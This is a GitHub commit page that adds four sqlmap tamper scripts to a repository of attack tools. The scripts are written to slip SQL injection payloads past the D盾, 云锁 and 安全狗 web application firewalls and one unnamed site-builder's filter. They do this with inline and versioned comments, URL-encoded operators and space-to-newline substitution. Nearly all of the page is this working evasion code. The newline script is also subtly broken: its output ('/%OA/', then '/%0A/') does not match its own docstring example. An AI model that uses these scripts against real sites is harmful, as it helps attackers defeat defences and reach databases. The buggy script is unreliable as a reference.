Skip to content

Commit

Permalink
add sqlmap bypass D盾/云锁/安全狗/空格替换换行 tamper
Browse files Browse the repository at this point in the history
  • Loading branch information
Mr-xn committed Nov 11, 2019
1 parent 8d87185 commit c2caaba
Show file tree
Hide file tree
Showing 5 changed files with 148 additions and 0 deletions.
4 changes: 4 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -122,6 +122,10 @@
- [crt.sh证书/域名收集](./tools/crt.sh证书收集.py)
- [TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/TPscan)
- [Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/struts-scan)
- [sqlmap_bypass_D盾_tamper](./tools/sqlmap_bypass_D盾_tamper.py)
- [sqlmap_bypass_安全狗_tamper](./tools/sqlmap_bypass_安全狗_tamper.py)
- [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py)
- [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py)

## 说明

Expand Down
34 changes: 34 additions & 0 deletions tools/sqlmap_bypass_D盾_tamper.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
# coding=UTF-8
# Desc: sqlmap_bypass_D盾_tamper

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW


def dependencies():
pass


def tamper(payload, **kwargs):
"""
BYPASS Ddun
"""
retVal = payload
if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
continue
elif payload[i] == '\'':
quote = not quote
elif payload[i] == '"':
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
continue
retVal += payload[i]
return retVal
27 changes: 27 additions & 0 deletions tools/sqlmap_bypass_云锁_tamper.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
# coding=UTF-8
# Desc: sqlmap bypass 云锁 tamper
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW


def dependencies():
pass


def tamper(payload, **kwargs):
payload = payload.replace('ORDER', '/*!00000order*/')
payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select')
payload = payload.replace('CONCAT(', "CONCAT/**/(")
payload = payload.replace("--", " */--")
payload = payload.replace("AND", "%26%26")
return payload
24 changes: 24 additions & 0 deletions tools/sqlmap_bypass_安全狗_tamper.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
# coding=UTF-8
# Desc: sqlmap_bypass_安全狗_tamper

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):

if payload:
payload=payload.replace(" ","/*!*/")
payload=payload.replace("=","/*!*/=/*!*/")
payload=payload.replace("AND","/*!*/AND/*!*/")
payload=payload.replace("UNION","union/*!88888cas*/")
payload=payload.replace("#","/*!*/#")
payload=payload.replace("USER()","USER/*!()*/")
payload=payload.replace("DATABASE()","DATABASE/*!()*/")
payload=payload.replace("--","/*!*/--")
payload=payload.replace("SELECT","/*!88888cas*/select")
payload=payload.replace("FROM","/*!99999c*//*!99999c*/from")
print payload

return payload
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
# coding=UTF-8
# Desc: sqlmap_bypass_某企业建站程序过滤_tamper

"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):
"""
把空格替换成换行符:%0A
Replaces space character (' ') with comments '%0A'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
>>> tamper('SELECT id FROM users')
'SELECT%0Aid%0AFROM%0Ausers'
"""

retVal = payload

if payload:
retVal = ""
quote, doublequote, firstspace = False, False, False

for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += "/%OA/"
continue

elif payload[i] == '\'':
quote = not quote

elif payload[i] == '"':
doublequote = not doublequote

elif payload[i] == " " and not doublequote and not quote:
retVal += "/%0A/"
continue

retVal += payload[i]

return retVal

0 comments on commit c2caaba

Please sign in to comment.